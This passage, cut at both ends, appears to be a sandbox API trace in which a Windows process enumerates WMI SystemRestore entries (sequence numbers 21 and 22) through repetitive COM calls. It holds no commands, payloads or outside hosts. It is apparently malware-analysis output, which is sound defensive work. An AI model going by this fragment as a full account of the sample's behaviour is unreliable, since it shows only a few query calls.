pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.859] IUnknown:AddRef (This=0x6027fe8) returned 0x3 [0122.859] IWbemClassObject:Get (in: This=0x6027fe8, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.859] IWbemClassObject:Get (in: This=0x6027fe8, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=21", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.859] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=21") returned 0x70 [0122.859] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=21") returned 0x70 [0122.859] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.859] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.859] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.859] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.860] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024930) returned 0x0 [0122.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024930, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.860] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024930, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x60257d0) returned 0x0 [0122.860] WbemDefPath:IUnknown:Release (This=0x6024930) returned 0x0 [0122.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x60257d0) returned 0x0 [0122.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.860] WbemDefPath:IUnknown:AddRef (This=0x60257d0) returned 0x3 [0122.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe17d8) returned 0x0 [0122.860] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe17d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.860] WbemDefPath:IUnknown:Release (This=0xbe17d8) returned 0x3 [0122.860] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.860] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.860] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x2 [0122.860] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x1 [0122.860] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.860] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x60257d0) returned 0x0 [0122.861] WbemDefPath:IUnknown:AddRef (This=0x60257d0) returned 0x3 [0122.861] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x2 [0122.861] WbemDefPath:IWbemPath:SetText (This=0x60257d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=21") returned 0x0 [0122.861] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.861] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.861] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.861] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.861] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.861] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.861] IWbemClassObject:Get (in: This=0x6027fe8, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a5da8*=0, plFlavor=0x38a5dac*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), pType=0x38a5da8*=19, plFlavor=0x38a5dac*=0) returned 0x0 [0122.861] IWbemClassObject:Get (in: This=0x6027fe8, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a5da8*=19, plFlavor=0x38a5dac*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), pType=0x38a5da8*=19, plFlavor=0x38a5dac*=0) returned 0x0 [0122.861] CoTaskMemAlloc (cb=0x4) returned 0xbe1818 [0122.861] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1818, puReturned=0x389bfe4 | out: apObjects=0xbe1818*=0x6028180, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.862] IUnknown:QueryInterface (in: This=0x6028180, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6028180) returned 0x0 [0122.862] IUnknown:QueryInterface (in: This=0x6028180, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.862] IUnknown:QueryInterface (in: This=0x6028180, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.862] IUnknown:AddRef (This=0x6028180) returned 0x3 [0122.862] IUnknown:QueryInterface (in: This=0x6028180, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.862] IUnknown:QueryInterface (in: This=0x6028180, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.862] IUnknown:QueryInterface (in: This=0x6028180, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6028184) returned 0x0 [0122.862] IMarshal:GetUnmarshalClass (in: This=0x6028184, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.862] IUnknown:Release (This=0x6028184) returned 0x3 [0122.862] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.862] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.862] IUnknown:QueryInterface (in: This=0x6028180, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.862] IUnknown:Release (This=0x6028180) returned 0x2 [0122.862] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.862] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.863] IUnknown:QueryInterface (in: This=0x6028180, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6028180) returned 0x0 [0122.863] IUnknown:AddRef (This=0x6028180) returned 0x4 [0122.863] IUnknown:Release (This=0x6028180) returned 0x3 [0122.863] IUnknown:Release (This=0x6028180) returned 0x2 [0122.863] CoTaskMemFree (pv=0xbe1818) [0122.863] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.863] IUnknown:AddRef (This=0x6028180) returned 0x3 [0122.863] IWbemClassObject:Get (in: This=0x6028180, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.863] IWbemClassObject:Get (in: This=0x6028180, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=22", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.863] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=22") returned 0x70 [0122.863] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=22") returned 0x70 [0122.863] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.863] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.863] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.863] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.864] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024940) returned 0x0 [0122.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024940, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.864] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024940, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025840) returned 0x0 [0122.864] WbemDefPath:IUnknown:Release (This=0x6024940) returned 0x0 [0122.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025840) returned 0x0 [0122.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.864] WbemDefPath:IUnknown:AddRef (This=0x6025840) returned 0x3 [0122.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1818) returned 0x0 [0122.864] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1818, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.864] WbemDefPath:IUnknown:Release (This=0xbe1818) returned 0x3 [0122.864] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.864] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.865] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x2 [0122.865] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x1 [0122.865] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.865] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.865] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025840) returned 0x0 [0122.865] WbemDefPath:IUnknown:AddRef (This=0x6025840) returned 0x3 [0122.865] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x2 [0122.865] WbemDefPath:IWbemPath:SetText (This=0x6025840, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=22") returned 0x0 [0122.865] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.865] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.865] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.865] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.865] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.865] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.865] IWbemClassObject:Get (in: This=0x6028180, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a65f8*=0, plFlavor=0x38a65fc*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), pType=0x38a65f8*=19, plFlavor=0x38a65fc*=0) returned 0x0 [0122.865] IWbemClassObject:Get (in: This=0x6028180, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a65f8*=19, plFlavor=0x38a65fc*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), pType=0x38a65f8*=19, plFlavor=0x38a65fc*=0) returned 0x0 [0122.865] CoTaskMemAlloc (cb=0x4) returned 0xbe2280 [0122.865] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe2280, puReturned=0x389bfe4 | out: apObjects=0xbe2280*=0x6028318, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.866] IUnknown:QueryInterface (in: This=0x6028318, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6028318) returned 0x0 [0122.866] IUnknown:QueryInterface (in: This=0x6028318, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.866] IUnknown:QueryInterface (in: This=0x6028318, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.866] IUnknown:AddRef (This=0x6028318) returned 0x3 [0122.866] IUnknown:QueryInterface (in: This=0x6028318, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.866] IUnknown:QueryInterface (in: This=0x6028318, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.866] IUnknown:QueryInterface (in: This=0x6028318, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x602831c) returned 0x0 [0122.866] IMarshal:GetUnmarshalClass (in: This=0x602831c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.866] IUnknown:Release (This=0x602831c) returned 0x3 [0122.866] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.866] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.867] IUnknown:QueryInterface (in: This=0x6028318, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.867] IUnknown:Release (This=0x6028318) returned 0x2 [0122.867] CoGetContextToken (in: pToken=0x6ee480 | out: 